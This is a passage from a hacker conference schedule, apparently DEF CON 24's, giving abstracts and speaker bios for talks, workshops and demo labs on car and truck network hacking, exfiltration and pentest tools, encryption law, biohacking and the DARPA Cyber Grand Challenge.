The CAN bus is really mainstream, and every now and then there are new tools coming out to deal with it. Everyone wants to control vehicles and already knows that you can make the horn honk by replaying that frame you captured. But is this all that there is on this topic? Reversing OEM and third party tools, capturing firmware update files on the fly, and hijacking Security Sessions on a bus are just a few examples of things that can be done as well. For this and more, we will introduce to you the CanBadger! It's not just a logger, neither an injector. It's a reversing tool for vehicles that allows you to interact in realtime with individual components, scan a bus using several protocols (yup, UDS is not the only one) and perform a series of tests that no other tool offers. The CanBadger is where the real fun begins when dealing with a vehicle, and you can build it under $60USD! If you are already done with replaying frames on the CAN bus and want to learn how that fancy chip-tuning tool deals with your car, or simply want to get Security Access to your vehicle without caring about the security key or algorithm, we are waiting for you!
Javier Vazquez Vidal is passionate about technology and specializes in hardware and embedded systems security. He studied Electromechanics and Telecommunications, developing a passion for electronics and technology since his youth. He has been part of several projects that involved well-known hardware, but his first public work was presented at DEF CON 21, the ECU tool. He developed the CHT, a tool to take over the CAN network, and had some fun with the ‘paella country’ smart meters. He is currently working as a Product Security Engineer at Code White GmbH, and has worked at companies such as Tesla, Daimler, Airbus Military and Visteon.
Ferdinand Noelscher is an information security researcher from Germany. He has been working in Information Security for several years now. Ferdinand is very passionate about Offensive Security research and has been working on numerous embedded security projects, and some lasers too. Furthermore, he gave a training together with Javier at hardwear.io. He is currently a Security Researcher at Code White.
Return to Index
DEFCON - Track One - Sunday - 13:00-13:59
Can You Trust Autonomous Vehicles: Contactless Attacks against Sensors of Self-driving Vehicle
Jianhao Liu Director of ADLAB, Qihoo 360
Chen Yan PhD student, Zhejiang University
Wenyuan Xu Professor, Electrical Engineering, Zhejiang University
To improve road safety and driving experiences, autonomous vehicles have emerged recently, and they can sense their surroundings and navigate without human inputs. Although promising and proving safety features, the trustworthiness of these cars has to be examined before they can be widely adopted on the road. Unlike traditional network security, autonomous vehicles rely heavily on their sensory ability of their surroundings to make driving decision, which opens a new security risk. Thus, in this talk we examine the security of the sensors of autonomous vehicles, and investigate the trustworthiness of the 'eyes' of the cars. In this talk, we investigate sensors whose measurements are used to guide driving, i.e., millimeter-wave radars, ultrasonic sensors, forward-looking cameras. In particular, we present contactless attacks on these sensors and show our results collected both in the lab and outdoors on a Tesla Model S automobile. We show that using off-the-shelf hardware, we are able to perform jamming and spoofing attacks, which caused the Tesla's blindness and malfunction, all of which could potentially lead to crashes and greatly impair the safety of self-driving cars. To alleviate the issues, at the end of the talk we propose software and hardware countermeasures that will improve sensor resilience against these attacks.
Jianhao Liu is the director of ADLAB at Qihoo 360. He specializes in the security of Internet of Things and Internet of Vehicles. He has reported a security vulnerability of Tesla Model S, led a security research on the remote control of a BYD car, and participated in the drafting of security standards among the automobile society. Being a security expert employed by various information security organizations and companies, he is well experienced in security service, security evaluation, and penetration test.
Chen Yan is a PhD student at Zhejiang University in the Ubiquitous System Security Laboratory. His research focuses on the security and privacy of wireless communication and embedded systems, including automobile, analog sensors, and IoT devices.
Wenyuan Xu is a professor in the College of Electrical Engineering at Zhejiang University and an associate professor in the Department of Computer Science and Engineering at University of South Carolina. She received her Ph.D. degree in Electrical and Computer Engineering from Rutgers University in 2007. Her research interests include wireless security, network security, and IoT security. She is among the first to discover vulnerabilities of tire pressure monitor systems in modern automobiles and automatic meter reading systems. Dr. Xu received the NSF Career Award in 2009. She has served on the technical program committees for several IEEE/ACM conferences on wireless networking and security, and she is an associated editor of EURASIP Journal on Information Security.
Return to Index
DEFCON - Track Three - Saturday - 12:00-12:59
CANSPY: a Framework for Auditing CAN Devices
Jonathan-Christofer Demay Airbus Defence and Space
Arnaud Lebrun Airbus Defence and Space
In the past few years, several tools have been released allowing hobbyists to connect to CAN buses found in cars. This is welcomed as the CAN protocol is becoming the backbone for embedded computers found in smartcars. Its use is now even spreading outside the car through the OBD-II connector: usage-based policies from insurance companies, air-pollution control from law enforcement or engine diagnostics from smartphones for instance. Nonetheless, these tools will do no more than what professional tools from automobile manufacturers can do. In fact, they will do less as they do not have knowledge of upper-layer protocols. Security auditors are used to deal with this kind of situation: they reverse-engineer protocols before implementing them on top of their tool of choice. However, to be efficient at this, they need more than just being able to listen to or interact with what they are auditing. Precisely, they need to be able to intercept communications and block them, forward them or modify them on the fly. This is why, for example, a framework such as Burp Suite is popular when it comes to auditing web applications. In this paper, we present CANSPY, a framework giving security auditors such capabilities when auditing CAN devices. Not only can it block, forward or modify CAN frames on the fly, it can do so autonomously with a set of rules or interactively using Ethernet and a packet manipulation framework such as Scapy.
It is also worth noting that it was designed to be cheap and easy to build as it is mostly made of inexpensive COTS. Last but not least, we demonstrate its versatility by turning around a security issue usually considered when it comes to cars: instead of auditing an electronic control unit (ECU) through the OBD-II connector, we are going to partially emulate ECUs in order to audit a device that connects to this very connector.
Jonathan-Christofer Demay, PhD is the current penetration testing team leader at AIRBUS Defence and Space. As a former academic researcher, he has been working on IDS bypassing, intrusion detection and general network security. Now a consultant for various key industries and government bodies, he is working on incident response, penetration testing and social engineering.
Arnaud Lebrun is a command and control engineer currently working at AIRBUS Defence and Space. He is focusing on security issues for several projects in the aerospace industry and related areas such as radioactive waste disposal facilities or large telescopes. He also supports the penetration testing team for perimeters that include ICS infrastructures or embedded electronics.
Return to Index
Workshops - Las Vegas Ballroom 2 - Friday - 10:00-14:00
Car Hacking Workshop
Robert Leale President, CanBusHack
KC Johnson Security Researcher
Introduction to connecting to Vehicle Networks. In the workshop we'll connect and send data to vehicle simulators and use scripts to fuzz messages. We will learn about vehicle systems and how they are connected.
Robert Leale is the President of CanBusHack a company specializing in vehicle network reverse engineering. He currently runs the DEF CON Car Hacking Village and is the trainer for Black Hat's Car Hacking Hands-On.
Hey, KC Johnson is really good at car hacking, no really! I saw him hack a car so that it's blinkers turned on. True Story. He can also connect things to cars, like, really fast. Also, he is like totally good at volleyball. OMG.
Max Class Size: 50
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: A laptop with Windows
Return to Index
DEFCON - Track Three - Friday - 12:30-12:59
Cheap Tools for Hacking Heavy Trucks
Six_Volts Research Mercenary
Haystack Vehicle Data Ninja
There has been much buzz about car hacking, but what about the larger heavy-duty brother, the big rig? Heavy trucks are increasingly networked, connected and susceptible to attack. Networks inside trucks frequently use Internet connected devices even on safety-critical networks where access to brakes and engine control is possible. Unfortunately, tools for doing analysis on heavy trucks are expensive and proprietary. Six_Volts and Haystack have put together a set of tools that include open hardware and software to make analyzing these beasts easier and more affordable.
Six_Volts is a "research mercenary" and has worked on High Performance Computing, embedded systems, vehicle networking and forensics, electronics prototyping and design, among other things. He's crashed cars for science, done digital forensics on a tangled mess of wires that used to be a semi truck, built HPC clusters out of old (and new) hardware, designed tools to extract data from vehicle EDRs, and in his spare time trains teams of students to defend enterprise networks.
Twitter: @Six_Volts
Haystack Haystack was a computer science student researching process control security, when one day he was recruited by a nefarious mechanical engineering professor hell-bent on dominating the field of accident reconstruction. After a series of dangerous training missions to various accident sites and junkyards, Haystack can now cut electronic control modules from wrecked trucks with surgical precision and extract crash data from them that was previously thought to be unrecoverable.
Return to Index
Demolabs - Table 1 - Saturday - 14:00-15:50
Cloakify Exfiltration Toolset
TryCatchHCF
The Cloakify
Toolset is a data exfiltration tool that uses text-based steganography
to hide data in plain sight, evade DLP/MLS devices, perform social
engineering of SecOps analysts, and evade AV detection. Very simple
tools, powerful concept, proven in real-world ops. Too many secure
enclaves rely solely on the combination of AV + Automated Data
Inspection + Analyst Review to prevent data exfiltration. This toolset
easily defeats them all.
TryCatchHCF is the Principal InfoSec Engineer & Lead
Pentester at LifeLock. He has 25+ years of security- and software
engineering experience, mostly in US gov't/DoD sectors, and served as
an Intelligence Analyst and Counterintelligence Specialist in the
United States Marine Corps. He hacked into his first systems in 1981
and wrote his first malware the following year, all while nearly being
eaten by a grue. More recently he took 1st place in the 2013 Lockheed
Martin Cyber Challenge. Education includes a bachelors degree in
Cognitive Science, a masters degree in Information Assurance, and the
collective hivemind of the global hacking community.
Return to Index
CPV - Bronze 1 - Saturday - 12:00-13:00
Talk Title:
Code breaking - Catching a cheat
Speaker Name, Employer or position:
Nezer Zaidenberg (scipio) - Computer Science faculty member at College of Management, Israel - Docent & Researcher at University of Jyvskyl, Finland
Abstract:
We describe the great contract bridge scandal of 2015 on which the top world top pairs were found to cheat by illegal information transfer.
We describe the inaccurate accusation against one of the pairs (Mr. Lotan Fisher and Mr. Ron Schwartz).
We describe our statistical efforts to prove lack of sufficient evidence for conviction beyond reasonable doubt.
We describe our discovery of the real code in which information is transferred and means to discover it.
Bio:
Nezer is a researcher in the IT faculty university of Jyvskyl, Finland and computer science faculty member in College of Management, Israel.
Social media links if provided:
http://www.scipio.org/
Return to Index
DEFCON - Track One - Friday - 11:00-11:59
Compelled Decryption - State of the Art in Doctrinal Perversions
Ladar LevisonFounder, Lavabit, LLC.
Get mirandized for an encrypted world. This talk will cover the legal doctrines and statues our government is perverting to compel individuals into decrypting their data, or conscript technology companies into subverting the security of their own products. We’ll survey the arguments being advanced by prosecutors, the resulting case law, and the ethical dilemmas facing technology companies. The session will cover the rights and civil liberties we’ve already lost, and review the current threats to our collective freedoms. We’ll cover what an individual needs to know if they want to avoid compelled decryption, and keep their data private. We’ll also discuss strategies that third parties (friends, f/oss developers, and technology companies) can use to resist conscription and build trust through transparency. Because knowing your rights, is only half the battle
Ladar Levison serves as the founder, president, and chief executive of Lavabit, where he has worked the past 12 years. Founded in 2004 (and originally called Nerdshack), Lavabit was created because Mr. Levison believes that privacy is a fundamental, necessary right for a functioning, free and fair democratic society. Presently, Mr. Levison is focused on Lavabit's Dark Mail Initiative, which aims to make end-to-end email encryption automatic and ubiquitous, while continuing to vigorously advocate for the privacy and free speech rights of all. Mr. Levison’s involvement in the internet can be traced to the early days of the world wide web, when he built his first website, in the early nineties for the fledgling Mosiac web browser (from the National Center for Supercomputing Applications).
Prior, Mr. Levison operated a dialup bulletin board service, and worked as a computer technician assembling custom computer systems. With more than 10 years of experience as an independent consultant, Mr. Levison has brought to bear his skills as a project manager, business analyst, systems engineer, software developer, database administrator, systems administrator, and information security specialist.
Mr. Levison’s career has involved working with several dozen multinational companies in the financial, consumer electronics, and retail sectors. The websites Mr. Levison built have drawn millions of visitors, and the software he's written has touched, albeit behind the scenes, the lives of millions more. Over the years, Mr. Levison has written and published numerous technical specifications and authored several editorial pieces. Mr. Levison frequently speaks at a variety of conferences, has appeared as an expert on numerous network television shows, and appeared in several documentaries; including the Oscar winning film, /Citizenfour/.
Mr. Levison has also been involved with several popular free open source software projects. Mr. Levison holds fifteen certifications, with the vast majority from Microsoft and International Business Machines. Mr. Levison received his Bachelor of Arts and Bachelor of Science degrees from Southern Methodist University, where he studied finance, English, political science and computer science. Additionally, Mr. Levison spent a year studying international relations at Georgetown University. A native of San Francisco, California, he currently resides in Dallas, Texas where he lives with his best friend, and principal cheerleader, Princess, the Italian Greyhound he rescued in 2010.
Twitter: @kingladar
Facebook
Darkmail
Lavabit
Return to Index
BHV - Skyview 4 - Friday - 15:00-15:59
Speakers: Mr. Br!ml3y
About Mr. Br!ml3y:
Mr_Br!ml3y is a DefCon Biohacking Village regular who is currently working on a PhD. from a research university in the Midwest. He also works in public sector network security to keep the lights on. His current research focuses on developing 3D computer models for contaminent transport in groundwater, with special emphasis on ionic contaminants (alkali metals and earths, halides). He has been exploring computational chemistry and nanochemistry to help with model development and bioinformatics as a side interest.
Abstract:
Determining effectiveness and fit of chemical compounds for human medical and health is a time-consuming and expensive process. One method for reducing time and expense is the use of computational chemistry to model compound-receptor binding, which helps rule out unpromising or suboptimal compounds. This presentation explores the fundamentals of computational chemistry for various applications and open-source programs available for use. Ab initio molecular modeling, molecular docking, and bioinformatics programs are discussed.
Return to Index
BHV - Skyview 4 - Friday - 15:00-15:59
Speakers: Mr. Br!ml3y
About Mr. Br!ml3y:
Mr_Br!ml3y is a DefCon Biohacking Village regular who is currently working on a PhD. from a research university in the Midwest. He also works in public sector network security to keep the lights on. His current research focuses on developing 3D computer models for contaminent transport in groundwater, with special emphasis on ionic contaminants (alkali metals and earths, halides). He has been exploring computational chemistry and nanochemistry to help with model development and bioinformatics as a side interest.
Abstract:
Determining effectiveness and fit of chemical compounds for human medical and health is a time-consuming and expensive process. One method for reducing time and expense is the use of computational chemistry to model compound-receptor binding, which helps rule out unpromising or suboptimal compounds. This presentation explores the fundamentals of computational chemistry for various applications and open-source programs available for use. Ab initio molecular modeling, molecular docking, and bioinformatics programs are discussed.
Return to Index
WOS - Skyview 6 - Friday - 15:10-15:59
Connections: Eisenhower and the Internet
Damon "Chef" Small, Technical Project Manager at NCC Group
"Rise of the Machines" conjures thoughts of the evolution of technology from the exclusive domain of computer scientists in the early days of our industry to including everyday people using - and often wearing - Internet-connected devices. With that theme in mind, the speaker researches the history of one large, government-funded infrastructure and compares it to another. Specifically, the Eisenhower Interstate System and the Internet. "Connections: Eisenhower and the Internet" explores what the logistical challenges of moving vehicles across the Country can teach us about cybersecurity. Although these two topics seem unrelated, the speaker will take the audience on a journey that begins with early 20th century road-building projects, travels through ARPANET and the commercialization of the Internet, and arrives at current-day cyberspace. These two massive infrastructures have changed the world, and there are important lessons that the former can teach about the latter. The presentation concludes with predictions about the future of the the Information Superhighway and how information security professionals can prepare.
Chef (Twitter: @damonsmall) earned his handle from his use of cooking metaphors to describe infosec concepts to laypeople. He began his career studying music at Louisiana State University and took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid 1990s. Following the dotcom bust in the early 2000s, Chef began focusing on cyber security. This has remained his passion, and over the past 16 years as a security professional he has supported infosec initiatives in the healthcare, defense, and oil and gas industries. In addition to his Bachelor of Arts in Music, Chef completed the Master of Science in Information Assurance degree from Norwich University in 2005. His role as Technical Project Manager at NCC Group includes working closely with consultants and clients in delivering complex security assessments that meet varied business requirements. Recent speaking engagements include DEFCON 23, BSides Austin, BSides San Antonio, HouSecCon, and ISSA Houston.
Return to Index
Demolabs - Table 4 - Saturday - 14:00-15:50
CrackMapExec
Marcello Salvati
CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
Written in Python and fully concurrent, it allows you to enumerate logged on users, spider SMB shares, execute psexec style attacks, auto-inject Mimikatz/Shellcode/DLL's into memory using Powershell, dump the NTDS.dit and much much more!
Equipment Requirements (Network Needs, Displays, etc):
Internet connection is preferred but not necessary. 1 Display to clone laptop screen.
Marcello Salvati is a full-time pentester/security consultant at Coalfire Labs who has a passion for creating tools and eating Sushi in his free time. He is an active contributor to multiple open-source projects/tools such as Responder, Impacket, Kali Nethunter, the Veil Framework and has also created and been actively maintaining multiple open-source projects.
Return to Index
WOS - Skyview 6 - Friday - 18:10-18:59
Crawling for APIs
Ryan Mitchell, Senior Software Engineer at HedgeServ
As client machines become more powerful and JavaScript becomes more ubiquitous, servers are increasingly serving up code for browsers to execute, rather than the display-ready pages of the past. This changes the face of web scraping dramatically, as simply wget'ing and parsing the response from a URL becomes useless without executing bulky JavaScript with third party plugins, reading through code logic manually, and/or digging through piles of browser junk.
However, moving page logic client side can also create data vulnerabilities, as companies leave internal APIs exposed to the world, in order for their client side code to make use of them. I'll show some examples of this practice on traditionally "impossible to scrape" pages, and also some tools I've developed to crawl domains and discover and document these hidden APIs in an automated way. While many bot prevention measures focus on traditional page scraping and site manipulation, scripts that crawl sites through API calls, rather than in a "human like" way through URLs, may present unique security challenges that modern web development practices do not sufficiently address.
Ryan Mitchell (Twitter: @kludgist)
Return to Index
BHV - Skyview 4 - Friday - 17:00-17:59
Speakers: David Bach
About David:
David Bach, MD
Founder and President, Platypus Institute
A Harvard-trained scientist, physician, and serial entrepreneur, Dr. Bach is the Founder and President of the Platypus Institute, an applied neuroscience research organization whose mission is to translate cutting-edge neuroscience discoveries into practical tools and programs that radically enhance the human experience. As an entrepreneur, Dr. Bach founded and built three healthcare technology companies, each of which became a $100M enterprise. He has also been a management consultant, a venture capitalist, a competitive martial artist and a professional cellist. He is also an avid biohacker.
Abstract:
During the past decade, a confluence of scientific breakthroughs in neuroimaging, biotechnology, cybernetics, sensor technology and data analytics have created a new tool in the self-improvement arsenal. Today, for the first time in history, we can “rewire” the human brain in highly targeted ways that dramatically enhance cognition, perception, creative ability, learning speeds and health. During this session, building largely on work from DARPA, we will explore emerging technologies you can use today to dramatically enhance your brain and your cognitive abilities. We will also take a look into the future of neurotech – and how it is going to fundamentally disrupt what it means to be human.
Return to Index
BHV - Skyview 4 - Friday - 17:00-17:59
Speakers: David Bach
About David:
David Bach, MD
Founder and President, Platypus Institute
A Harvard-trained scientist, physician, and serial entrepreneur, Dr. Bach is the Founder and President of the Platypus Institute, an applied neuroscience research organization whose mission is to translate cutting-edge neuroscience discoveries into practical tools and programs that radically enhance the human experience. As an entrepreneur, Dr. Bach founded and built three healthcare technology companies, each of which became a $100M enterprise. He has also been a management consultant, a venture capitalist, a competitive martial artist and a professional cellist. He is also an avid biohacker.
Abstract:
During the past decade, a confluence of scientific breakthroughs in neuroimaging, biotechnology, cybernetics, sensor technology and data analytics have created a new tool in the self-improvement arsenal. Today, for the first time in history, we can “rewire” the human brain in highly targeted ways that dramatically enhance cognition, perception, creative ability, learning speeds and health. During this session, building largely on work from DARPA, we will explore emerging technologies you can use today to dramatically enhance your brain and your cognitive abilities. We will also take a look into the future of neurotech – and how it is going to fundamentally disrupt what it means to be human.
Return to Index
BHV - Skyview 4 - Sunday - 10:30-10:59
Speaker: Dr. Thomas P. Keenan
@drfuture
www.technocreep.com
About Dr. Thomas P. Keenan:
Dr. Thomas P. Keenan worked as a Systems Programmer on some of the earliest mainframe and timesharing systems, and cracked his first computer mischief case, “The Missionary Unmasker”, in 1973. He was educated at Columbia University, receiving BA, M.Sc., MA and Ed.D. degrees in Philosophy, Mathematics, Engineering and Education and is a popular professor of Environmental Design and Computer Science at the University of Calgary. As a busy and adventurous tech journalist, he scrubbed in on an organ transplant operation in Belgium, held Anthrax spores at Canadian Forces Base Suffield, and defused an IED in Afghanistan.
Tom taught Canada’s first computer crime course, in 1974, and was involved in drafting that country’s inaugural computer crime legislation. He has been an expert witness in civil and criminal cases involving technology, computer fraud, and claimed online defamation. He is the author of over 500 academic papers, book chapters, presentations and articles, and has spoken on five continents and won major honors and prizes including the $10,000 NSERC Award for Science Promotion. His 2014 book, Technocreep, dissects how technology is becoming creepy in hidden ways that are difficult for most people to understand. It has recently appeared in the top ten on Amazon.ca in categories including Civil Rights and Liberties, Technology & Society, and Social Aspects of Technology.
Abstract:
The announcement in 2012 that a natural phenomenon called CRISPR/Cas9 could be used as a kind of “precision gene editor” has a lot of people thinking. Exactly what does "gene editing" involve? What can be done right now in big labs? What about in your basement? Harvard Medical School professor George Church argued that “garage biologists” should be required to have a license to practice synthetic biology, but right now it’s a kind of Wild West out there. Sound familiar? We survived all those 1980s Commodore 64 computer hacking pranks and learned a lot from them. Then again, they didn’t involve E. coli and the possibility of mass annihilation. This presentation sorts out the biofacts from the biofiction, and suggests how DIY biology fans can use CRISPR/Cas9 to help make things better for themselves and the world.
Return to Index
CPV - Bronze 2 - Sunday - 12:00-12:30
Talk Title:
Crypto for Criminals: The OPSEC Concerns in Using Cryptography
Speaker Name, Employer or position:
John Bambenek - Manager of Threat Systems at Fidelis Cybersecurity
Abstract:
Its a given that the use of cryptography is a good thing to protect confidentiality and privacy of ones online activities. However, there are a variety of pieces of information and metadata that can still be useful to attribute the individual using the crypto. This talk will cover OPSEC concerns with using crypto (and when not to use it). Additionally, a tool for random generation of self-signed certs will be discussed.
Bio:
John Bambenek is Manager of Threat Systems at Fidelis Cybersecurity and an incident handler with the Internet Storm Center. He has been engaged in security for 15 years researching security threats. He is a published author of several articles, book chapters and one book. He has contributed to IT security courses and certification exams covering such subjects as penetration testing, reverse engineering malware, forensics, and network security. He has participated in many incident investigations spanning the globe. He speaks at conferences around the world and runs several private intelligence groups focusing on takedowns and disruption of criminal entities.
Social media links if provided:
@bambenek
Return to Index
DEFCON - Track Three - Saturday - 17:00-17:59
Crypto: State of the Law
Nate Cardozo Senior Staff Attorney, Electronic Frontier Foundation
Strong end-to-end encryption is legal in the United States today, thanks to our victory in what’s come to be known as the Crypto Wars of the 1990s. But in the wake of Paris and San Bernardino, there is increasing pressure from law enforcement and policy makers, both here and abroad, to mandate so-called backdoors in encryption products. In this presentation, I will discuss in brief the history of the first Crypto Wars, and the state of the law coming into 2016. I will then discuss what happened in the fight between Apple and the FBI in San Bernardino and the current proposals to weaken or ban encryption, covering proposed and recently enacted laws in New York, California, Australia, India, and the UK. Finally, I will discuss possible realistic outcomes to the Second Crypto Wars, and give my predictions on what the State of the Law will be at the end of 2016.
Nate Cardozo is a Senior Staff Attorney on the Electronic Frontier Foundation’s digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF’s cryptography policy and the Coders’ Rights Project. Nate has projects involving export controls on software, state-sponsored malware, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings.
Twitter: @ncardozo
Return to Index
Demolabs - Table 2 - Saturday - 10:00-11:50
CuckooDroid 2.0
Idan Revivo
To combat the growing problem of Android malware, we present a new solution based on the popular open source framework Cuckoo Sandbox to automate the malware
investigation process. Our extension enables the use of Cuckoo's features to analyze
Android malware and provides new functionality for dynamic and static analysis. Our
framework is an all in one solution for malware analysis on Android. It is extensible and
modular, allowing the use of new, as well as existing, tools for custom analysis.
Idan Revivo is a Mobile Security Technology/Team Leader at IBM-Trusteer focusing on
mobile malware, previously a mobile malware researcher at Checkpoint's malware research
team. He has presented at numerous security conferences. He specializes in Android
internals and sandboxing techniques. This includes automated static and dynamic malware
analysis. He has a diverse security background, which includes vulnerability analysis and
electronic warfare providing him with a broad and unique perspective on the cyber arena.
Idan holds a bachelor's degree in Software Engineering, specializing in Mobile Systems.
Return to Index
DEFCON - Track Three - Saturday - 13:00-13:59
Cunning with CNG: Soliciting Secrets from Schannel
Jake Kambic Hacker
Secure Channel (Schannel) is Microsoft's standard SSL/TLS Library underpinning services like RDP, Outlook, Internet Explorer, Windows Update, SQL Server, LDAPS, Skype and many third party applications. Schannel has been the subject of scrutiny in the past several years from an external perspective due to reported vulnerabilities, including a RCE.
What about the internals? How does Schannel guard its secrets? This talk looks at how Schannel leverages Microsoft's CryptoAPI-NG (CNG) to cache the master keys, session keys, private and ephemeral keys, and session tickets used in TLS/SSL connections. It discusses the underlying data structures, and how to extract both the keys and other useful information that provides forensic context about connection. This information is then leveraged to decrypt session that use ephemeral cipher suites, which don't rely on the private key for decryption. Information in the cache lives for at least 10 hours by default on modern configurations, storing up to 20,000 entries for client and server each. This makes it forensically relevant in cases where other evidence of connection may have dissipated.
Jake Kambic is a DFIR researcher and network penetration tester
Twitter: @TinRabbit
Return to Index
Workshops - Las Vegas Ballroom 2 - Saturday - 10:00-14:00
Cyber Deception: Hunting advanced attacks with MazeRunner
Dean Sysman CTO and co-founder @ Cymmetria
Detecting advanced threats is now under the assumption of impossibility or unlikeliness. One of the main waves in cyber security promising to enable that ability is cyber deception, a field that has garnered much attention and investments in the last couple of years. Based on the same concepts as honeypots, but on a different technology, cyber deception promises to create decoys and other assets to make attackers expose themselves and allow it's users to not only detect them, but collect forensics that can be used for immediate mitigation.
During this workshop, attendees will learn about MazeRunner, Cymmetria's cyber deception solution which is being released for the first time as the first cyber deception free general use tool. Along with it they will be able to set up deception across environments that will be composed of decoys - real virtual machines that can be linux/windows systems. Configure these machines with different network protocols and content to make them look like anything to deceive a hacker, and lastly creating the connections and credentials to these configurations to deploy to the endpoints, thereby creating a complete layer of deception to lead an attacker. Next we will show how to use the alerts and forensics gathered in order to enable automatic mitigation of threats and enrich your threat intel efforts.
Dean Sysman is CTO and co-founder of Cymmetria, an Israeli cyber deception start-up. A unit 8200 veteran, Dean started his military intelligence career first as a low-level security researcher, later on promoted to the rank of Captain to lead high level security research, earning multiple awards for his service. Already when he was 15, he won first place in the prestigious Robotics Olympiad, and by the age of 19 earned his B.Sc. in computer sciences. Before joining Cymmetria, Dean was involved in the development of cross platform translation compiler for embedded processors.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Laptop with these software requirements: web browser, Metasploit framework is optional.
Return to Index
DEFCON - Track Two - Sunday - 15:00-15:59
Cyber Grand Shellphish
Yan Shoshitaishvili PhD Student, UC Santa Barbara
Antonio Bianchi UC Santa Barbara
Kevin Borgolte UC Santa Barbara
Jacopo Corbetta UC Santa Barbara
Francesco Disperati UC Santa Barbara
Andrew Dutcher UC Santa Barbara
Giovanni Vigna UC Santa Barbarae
Aravind Machiry UC Santa Barbara
Chris Salls UC Santa Barbara
Nick Stephens UC Santa Barbara
Fish Wang UC Santa Barbara
John Grosen UC Santa Barbara
Last year, DARPA ran the qualifying event for the Cyber Grand Challenge to usher in the era of automated hacking. Shellphish, a rag-tag team of disorganized hackers mostly from UC Santa Barbara, decided to join the competition about ten minutes before the signups closed.
Characteristically, we proceeded to put everything off until the last minute, and spent 3 sleepless weeks preparing our Cyber Reasoning System for the contest. Our efforts paid off and, as we talked about last DEF CON , against all expectations, we qualified and became one of the 7 finalist teams. The finals of the CGC will be held the day before DEF CON.
If we win, this talk will be about how we won, or, in the overwhelmingly likely scenario of something going horribly wrong, this talk will be about butterflies.
In all seriousness, we've spent the last year working hard on building a really kickass Cyber Reasoning System, and there are tons of interesting aspects of it that we will talk about. Much of the process of building the CRS involved inventing new approaches to automated program analysis, exploitation, and patching. We'll talk about those, and try to convey how hackers new to the field can make their own innovations.
Other aspects of the CRS involved extreme amounts of engineering efforts to make sure that the system optimally used its computing power and was properly fault-tolerant. We'll talk about how automated hacking systems should be built to best handle this. Critically, our CRS needed to be able to adapt to the strategies of the systems fielded by the other competitors. We'll talk about the AI that we built to strategize throughout the game and decide what actions should be taken.
At the end of this talk, you will know how to go about building your own autonomous hacking system! Or you might know a lot about butterflies.
Shellphish is a mysterious hacking collective famous for being great partiers and questionable hackers. The secret identities of the Shellphish CGC team are those of researchers in the security lab of UC Santa Barbara. When they're not CTFing or surfing, they're doing hard-hitting security research. Their works have been published in numerous academic venues and featured in many conferences. In 2015, they unleashed angr, the next (current?) generation of binary analysis, and have been working hard on it ever since!
Return to Index
BHV - Skyview 4 - Saturday - 14:00-14:59
Speaker: Awesome Folks from Various BioHacking Podcasts
Moderators:
Moderators: c00p3r and cur50r from Dangerous Minds Podcast; McStuff from 2 Cyborgs and a Microphone; Sciaticnerd from Security Endeavours.
Abstract:
For this panel, two of the hosts of “Dangerous Minds Podcast” will be joined by one of the Hosts of “Two Cyborgs and a Microphone” and Sciaticnerd from "Security Endeavours" will be recording a normal episode with a mystery guest and or guests to celebrate the 100th episode of DMP, and our first live recording. Join us for the learning, stay for the laughs, without editing out our goofs, and turn the tables on everyone and ask your own questions as well. To which we can all learn together. It’s going to be a little bit fun, a little bit of learning, and a lot of laughs as always. Come out and join us, and bring your own spark! And perhaps go away with more.
Return to Index
BHV - Skyview 4 - Saturday - 14:00-14:59
Speaker: Awesome Folks from Various BioHacking Podcasts
Moderators:
Moderators: c00p3r and cur50r from Dangerous Minds Podcast; McStuff from 2 Cyborgs and a Microphone; Sciaticnerd from Security Endeavours.
Abstract:
For this panel, two of the hosts of “Dangerous Minds Podcast” will be joined by one of the Hosts of “Two Cyborgs and a Microphone” and Sciaticnerd from "Security Endeavours" will be recording a normal episode with a mystery guest and or guests to celebrate the 100th episode of DMP, and our first live recording. Join us for the learning, stay for the laughs, without editing out our goofs, and turn the tables on everyone and ask your own questions as well. To which we can all learn together. It’s going to be a little bit fun, a little bit of learning, and a lot of laughs as always. Come out and join us, and bring your own spark! And perhaps go away with more.
Return to Index
DEFCON - Track Two - Friday - 10:00-10:59
DARPA Cyber Grand Challenge Award Ceremony
Mike Walker DARPA Program Manager
Dr. Arati Prabhakar DARPA Director
On Friday morning, August 5th, DARPA will announce the prize winners and recognize the parties responsible for building and competing in the Cyber Grand Challenge (CGC), the world's first all-machine hacking tournament, which was completed August 4th. Seven high performance computers will have completed an all-machine Capture the Flag contest, reverse engineering unknown binary software, authoring new IDS signatures, probing the security of opponent software, and re-mixing defended services with machine-generated patches and defenses. Come hear about what transpired at CGC, and learn which team will be taking home the $2M grand prize, as well as the $1M second place and $750K third place prizes
Mike Walker is the DARPA program manager for the Cyber Grand Challenge. His research interests include machine reasoning about software in situ and the automation of application security lifecycles. Prior to joining DARPA, Mr. Walker worked in industry as a security software developer, Red Team analyst, enterprise security architect and research lab leader. As part of the Computer Science Corporation ‘Strikeforce’ Red Team, Mr. Walker helped develop the HEAT Vulnerability Scanner and performed Red Team engagements. Serving as a principal at the Intrepidus Group, Mr. Walker worked on Red Teams that tested America's financial and energy infrastructure for security weaknesses. Also, on the DARPA SAFER Red Team, Mr. Walker discovered flaws in prototype communications technologies. Mr. Walker has participated in various roles in numerous applied computer security competitions. He contributed challenges to DEF CON Capture the Flag (CTF) and competed on and led CTF teams at the highest levels of international competition. Mr. Walker was formerly a mentor of the Computer Security Competition Club at Thomas Jefferson High School for Science and Technology (TJHSST).
Arati Prabhakar, Ph.D., is director of the Defense Advanced Research Projects Agency (DARPA). Serving in this position since July 2012, she has focused the agency's efforts on rethinking complex military systems in fundamental ways; harnessing the information explosion to address national security challenges; and planting new seeds of technological surprise in fields as diverse as mathematics, synthetic biology, and neurotechnology.
